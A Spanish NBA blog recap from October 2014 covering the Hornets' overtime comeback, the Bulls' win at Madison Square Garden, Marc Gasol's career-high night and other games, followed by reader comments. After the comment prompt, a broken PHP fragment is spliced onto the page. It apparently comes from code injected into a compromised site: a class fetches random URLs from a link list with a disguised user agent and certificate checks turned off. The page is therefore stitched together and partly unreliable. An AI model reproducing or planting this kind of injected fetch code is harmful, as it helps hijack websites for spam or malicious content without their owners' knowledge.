La crónica (29/10/2014): El poderoso influjo de las abejas

30 de October de 2014 por FranGuaita

Segundo capítulo de la temporada y ya hemos vivido una de esas remontadas épicas con sello NBA. Charlotte Hornets perdía de paliza en el tercer cuarto (50-74) y acabó remontando para ganar en la prórroga con dos tiros de ensueño a cargo de la factoría Kemba. Además, paseo plácido de Chicago en la Gran Manzana y mejor marca anotadora de su carrera para Marc Gasol: 32 puntos en el triunfo de Memphis ante los Timberwolves de Ricky Rubio. Pasen y lean.

HORNETS 108 – BUCKS 106 (OT)
Michael Jordan no pudo contener la tensión y se levantó de su asiento anexo al banquillo de los Hornets para no perderse ni un solo detalle del último ataque de su franquicia (sic). Sudadera oscura con el logo de las abejas, pantalón largo cómodo, esbozó una sonrisa cuando el triple de Kemba que servía para forzar la prórroga hizo estallar al Time Warner Cable Arena. Charlotte acababa de consumar la mayor remontada en su historia, bajo cualquiera de las denominaciones (Hornets/Bobcats). 24 puntos (en el arranque del tercero, perdía 50-74). Faltaba la guinda. Conseguir la W en el tiempo extra. Fueron cinco minutos dramáticos. Khris Middleton sembró la zozobra en el panal con cuatro puntos consecutivos, pero un veterano con una hoja de servicios impecable como Marvin Williams acertó con dos suspensiones clutch. Metidos de lleno en la hora de la verdad, de nuevo Kemba se agigantó para sellar el primer triunfo de los Hornets. A falta de cinco segundos, anotó una suspensión punteada desde 21 pies que ya forma parte de la leyenda. Derrota traumática al margen, excelentes prestaciones en Milwaukee de Brandon Knight (22 puntos, 8 rebotes, 13 asistencias). En Charlotte, no descarten que Steve Clifford utilice en momentos puntuales una configuración de quinteto con tres pequeños (Stephenson-Kemba-Neal). Anoche le generó dividendos. Kidd Gilchrist -antes de los dos canastones de Walker- fue designado MVP del partido por la televisión oficial de los Hornets: 17 puntos, 8 rebotes y 3 tapones.

kemba

KNICKS 80 – BULLS 104

La imagen desértica del Madison en el trash time resume a la perfección el estreno de dos franquicias que cohabitan en antítesis. Bajo la dirección de Phil Jackson en las alturas y Derek Fisher en el banquillo, los Knicks inician un proyecto -en teoría- de cinco años. Están muy verdes. Nada que ver con los Bulls de ese laboratorio humano llamado Tom Thibodeau. New York apenas resistió un cuarto a Chicago. Que se preparen en la Windy City, porque puede ser su año. Les sobran los motivos. 1) En contra de la penúltima bobada de Shaq, ni viejo ni acabado. Pau Gasol le sienta como un guante al libro de jugadas de Thibs. Anoche se marchó a los 21 puntos y 11 rebotes con una facilidad asombrosa. Su veinte-diez de toda la vida, como si no hubiera pasado el tiempo. 2) Derrick Rose no es ni la sombra de su mejor versión, pero lo será. Thibodeau lo sabe y le dosifica. (21 minutos en el MSG). 3) La segunda unidad carbura mejor que algunas primeras (véase Lakers). Taj Gibson, Aaron Brooks y McDermott se combinaron anoche para 47 puntos. Palabras mayores. Y 4) Si a Dunleavy le da por defender en más ocasiones como esta madrugada a Carmelo… en Chicago todo es posible. Todo.

GRIZZLIES 105 – TIMBERWOLVES 101
En el reino de Marc Gasol nunca se pone el sol. Todos los analistas NBA que le sitúan en la atalaya de los centers puros en el oeste tienen desde anoche otro capítulo más para su argumentario. 32 puntos. La mejor marca anotadora de su carrera NBA. 6 de ellos en momentos decisivos. En esos segundos en los que los reyes del mambo sufren ataques de muñeca caliente. Y todos los jugones sonríen igual, la eterna incógnita que obsesionaba al mito Montes. Con 99-96 y el partido en el alambre, Marc enchufó un tiro marca de la casa desde más allá de la frontera de los 22 pies que finiquitó el conato de rebelión de los lobos de Minneapolis. Inmediatamente, dirigió su mirada al banquillo de Memphis y, mientras bajaba a defender, estalló en una carcajada incontenida. Acababa de concluir otro día en la oficina. Intenso, eso sí. Exigente. Minnesota vendió cara su piel. Thaddeus Young (26 puntos) generó problemas a Z-Bo jugando abierto y MoWilliams (18 puntos) insufló energía desde el banquillo en momentos de cortocircuito.

Resto de la jornada

PACERS 103 – 76ERS 91
Ante la ausencia de Paul George, David West, George Hill y CJ Watson por lesión, Roy Hibbert asumió el control de las operaciones. El center de los Pacers firmó una impecable actuación con 22 puntos, 8 rebotes y 7 tapones. Además, cinco jugadores alcanzaron las dobles figuras en Indiana, con mención especial para Donald Sloan (16 puntos, 10 rebotes y 6 asistencias).

HEAT 107 – WIZARDS 95
Dwyane Wade anotó 12 de sus 21 puntos en la recta final de partido para sellar el primer triunfo de la temporada de los nuevos Miami Heat. Los problemas físicos de Wade en determinadas secuencias de partido provocaron que Bosh llevara el peso del equipo en ataque. El que fuera pivot de los Raptors se marchó a los 26 puntos, capturando además 15 rebotes. Norris Cole, estrenando rol de playmaker titular, consiguió 23 puntos, máximo de su carrera NBA.

CELTICS 121 – NETS 105
Triunfo coral de Boston en el estreno de la regular season. Regreso de Rajon Rondo con doble doble (13 puntos, 12 asistencias) y ocho jugadores célticos en dobles figuras. El equipo que dirige Brad Stevens sentenció a Brooklyn en los dos primeros cuartos. (67-41 al descanso)

RAPTORS 109 – HAWKS 102
El defensor del título en la Atlantic Division arranca con victoria. DeMar DeRozan (15 puntos, 11 rebotes) y Kyle Lowry (11 puntos, 10 asistencias) lideraron a nivel estadístico en la franquicia canadiense.

JAZZ 93 – ROCKETS 104
Back to back exitoso para Houston en su primer minitrip. Tras imponerse a los Lakers en la madrugada del martes al miércoles, anoche hicieron lo propio con Utah. Dwight Howard (22 puntos, 10 rebotes), MVP de un partido que no se decidió hasta el último periodo (parcial de 21-29 para los Rockets).

NUGGETS 89 – PISTONS 79
Manimal sigue con el excelente nivel de intensidad que le convirtió en una de las piedras angulares de la selección estadounidense campeona del mundo este verano en España. 22 puntos y 17 rebotes para ser el referente de unos Nuggets que secaron a Detroit en la recta final del encuentro.

LAKERS 99 – SUNS 119
Nos cuenta ESPN que nunca antes, desde que residen en LA, habían perdido los Lakers por dobles dígitos sus dos primeros partidos de la temporada. Tras el -18 ante los Rockets, anoche fueron -20 en Phoenix frente a unos Suns que desplegaron su estilo agresivo, más aún si cabe con la llegada de Isaiah Thomas. 23 puntos para el ex Kings y 31 de Kobe Bryant en unos Lakers en estado de depresión.

WARRIORS 95 – KINGS 77
Debut con victoria de Steve Kerr en los banquillos. Los Splash Bros. no estuvieron especialmente acertados pero sí lo suficiente para tumbar a unos Kings que apenas vieron aro (30% FG). Kerr, que tenía la baja de David Lee, salió con Barnes y Green de inicio, pero fue Speights desde el banco quien ejerció de tercera espada.

THUNDER 89 – BLAZERS 106
Con solo nueve jugadores disponibles para Scott Brooks, era más que previsible lo que veríamos en el estreno de los Thunder: muchos puntos (y tiros) de Westbrook y derrota frente a los Blazers. Durante buena parte del encuentro, la fórmula funcionó para OKC, pero en la segunda mitad los Blazers ajustaron su defensa y la lógica se impuso de la mano de Aldridge, Batum y Matthews.

Premios

MVP: Magnífico estreno de temporada para Marc Gasol, que alcanzó su mejor marca anotadora y se fue hasta los 32 puntos, 9 rebotes, 3 asistencias, 2 robos y 2 tapones para sellar una trabajadísima victoria ante los Wolves. Su sociedad con Zach Randolph (25-13) sigue dando réditos a los Grizzlies. Hay que mencionar también a Hibbert (22-8-7), Faried (22-17) y a Chris Bosh, que solo ha necesitado un partido para reivindicarse: 26 puntos, 15 rebotes, 4 asistencias y victoria de los Heat post LeBron contra los Wizards.

Rookie: 6-3-2 para Wiggins, 8-4-1-1 para Jabari, 10-2-2-4 para Marcus Smart, 5-7 para Nurkic, 5-1-1 para Exum, 6-10-3 para Noel, 7-2 para Bogdanovic, 9 puntos para Staukas, 4-2-2 para Clarkson… no fue un gran día para los novatos, así que nos quedamos con Doug McDermott, autor de 12 puntos, 5 rebotes y 2 asistencias.

La sorpresa: Sorpresa no ¡sorpresón! Habíamos visto y leído sobre el cambio en la mecánica de tiro de MKG, pero estas cosas hay que verlas en un partido de verdad. Y vaya si lo vimos. Kidd-Gilchrist anotó 17 puntos y lo hizo con varios tiros en suspensión (sin triples, tampoco nos pasemos). Tampoco esperábamos, ni de lejos, los 18 puntos, 3 rebotes y 5 asistencias de Alexey Shved en su estreno con los Sixers. Si sigue jugando tan bien corre el riesgo de que lo corten.

La decepción: Desastroso estreno de los dos equipos neoyorquinos que no hace presagiar nada bueno para unos y otros. Los Nets encajaron 121 puntos en Boston y los Knicks se quedaron en 80 en la puesta de largo del triángulo ofensivo en el MSG.

Mayor esfuerzo en vano: Brandon Knight se quedó cerca del triple doble y de la victoria, pero Kemba Walker le arrebató lo segundo y le faltaron dos rebotes para lo primero. El base de los Bucks logró 22 puntos, 8 rebotes y 13 asistencias. También fueron en vano los 38 puntos de Westbrook en Portland y los 31 de Kobe en Phoenix.

Top 10

Comenta

12 comentarios a esta entrada

  1. rumbero dice:
    #1

    Muy top las crónicas hasta el momento, y más con jornadas llenas de partidos como la última. ¿El amigo Fran Guaita tiene algo que ver con el periodista de la SER?

    Yo me vi un rato el Bulls-Knicks y la verdad es que hay poco que contar. Estos Knicks van a palmar cada dia que se encuentren con una buena pintura. Que la de Chicago es una de las mejores de la liga, pero Gasol y Gibson hicieron lo que quisieron. Ojo este último para el premio al mejor sexto hombre.

      Citar

  2. MagicJohnson32 dice:
    #2

    ¡Qué burrada el mate de Ennis sobre Rasual Butler! Tampoco está nada mal el de Stephenson en la cara de Sanders.

    Buena jornada y mejor crónica.

    Me gustaron los Bucks, pese a dejarse remontar y la derrota final. Aunque me cuesta entender qué lleva a Kidd a poner a Jared Dudley de titular y 26 minutos de juego, precisamente en una posición donde tiene muchas alternativas y jugadores con proyección y con Mayo y Giannis jugando mucho mejor. En cualquier caso, pese a que no vayan a ganar muchos partidos, la diferencia con el proyecto de los Sixers es abismal.

      Citar

  3. MagicJohnson32 dice:
    #3

    rumbero:
    Muy top las crónicas hasta el momento, y más con jornadas llenas de partidos como la última. ¿El amigo Fran Guaita tiene algo que ver con el periodista de la SER?

    El mismo. ¿Qué te parece el fichaje que hemos hecho? Fran va a ocuparse de varias crónicas semanales, y ya veis qué lujazo supone. Eso sí, los días que descanse no esperéis tal nivel de detalle, jaja.

      Citar

  4. diestro dice:
    #4

    Iba a daros la enhorabuena por el fichaje de Fran Guaita, pero voy a dársela a Fran por el privilegio de escribir en tjnba jajaja.

    Se agradece el nivel de detalle y la calidad de las crónicas. Seguir así.

      Citar

  5. TheDeerHunter dice:
    #5

    Con las nuevas crónicas y nuevos fichajes nadie se acuerda del tío Deer… XD XD XD

    Tomátelo con calma Fran que la temporada es muy laaarga!!

    Me encantaron los Bulls anoche, aunque tenían la panda de amigos eixa delante… y eso que Jimmy no estaba y se va a perder casi todo el primer mes. Sólo les faltaba a estos Bulls fluidez ofensiva y si no pasa ninguna desgracia ya la tienen. Equipo a seguir.

      Citar

  6. MagicJohnson32 dice:
    #6

    TheDeerHunter:
    Con las nuevas crónicas y nuevos fichajes nadie se acuerda del tío Deer… XD XD XD

    ¿Cómo que no? Mañana haces crónica tú ¿no?

      Citar

  7. HisRoyalAirness dice:
    #7

    Vale que los Knicks están de paseo pero los Bulls son un rodillo… y a medio gas. No sé cuántos minutos jugaron Pau y Rose pero me dio la sensación de que bastante pocos. Y vi a Rose anotar muy fácil. Gibson es un jugadorazo para la segunda unidad, y además tienen todos buen tamaño, sin contar a Noah y Gasol. El frontcourt acojona.

      Citar

  8. HisRoyalAirness dice:
    #8

    TheDeerHunter:
    Con las nuevas crónicas y nuevos fichajes nadie se acuerda del tío Deer… XD XD XD

    Tomátelo con calma Fran que la temporada es muy laaarga!!

    Me encantaron los Bulls anoche, aunque tenían la panda de amigos eixa delante… y eso que Jimmy no estaba y se va a perder casi todo el primer mes. Sólo les faltaba a estos Bulls fluidez ofensiva y si no pasa ninguna desgracia ya la tienen. Equipo a seguir.

    Claro que nos acordamos!!

      Citar

  9. Josgel dice:
    #9

    Que gustazo leer un par de crónicas de este calibre después de cruzar el desierto del verano sin NBA.

      Citar

  10. Denise dice:
    #10

    Muy bien Papanikolau ¿lo habrá metido alguien en el quinteto rookie? no esperaba nada del griego y está sosteniendo la 2º unidad de los Rockets, la cual es para echarse a llorar. Si un tal Tariq Black y un acabado como Terry testán tenendo que jugar 20 minutos por noche, apaga y vamonos. El 2-0 de los texanos creo que es bastante engañoso y cada vez lo veo con menos pinta de equipo PO.
    Personalmente, me gustaría que le dieran bola a Clint Capela en quién tengo puesta bastantes esperanzas en el futuro.

      Citar

  11. GreenPride dice:
    #11

    Empezó la temporada y ya tenemos los primeros apuntes.
    Los Bulls prometen aunque aún le queda mucho camino (sobre todo a Rose).
    Blazers, Suns, Mavs, Spurs, Warriors, Rockets … El Oeste sigue siendo tierra salvaje
    Los Thunder van a echar muuuucho de menos a Durantula.
    Cuidado con Pelicans y Grizzlies, pueden ser los outsiders de la competición (La Ceja y Marc comandando a cada equipo, se les espera gran temporada para ambos).
    Los Heat seguirán siendo equipo de PO y posible ventaja campo en el Este, sobre todo si Wade está con una salud medio buena. Bosh parece liberado en ataque sin LeBron.
    Lakers y Knicks siguen van a ser el hazmerreir de la NBA. Mala pinta también para los Nets.
    Nuggets y Wolves van a ser divertidos de ver.
    Los mesías Wiggins y Parker todavía no saben de que va la película…
    Así como primeros apuntes, veremos a ver cómo va luego el tema.

      Citar

  12. Nacho dice:
    #12

    La vuelta del hijo pródigo, polvos al aire, … y… ZAS!!! en toda la boca, by (oh la là) the Knicks.
    Eso sí, la camiseta de los Cav’s, preciosa.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>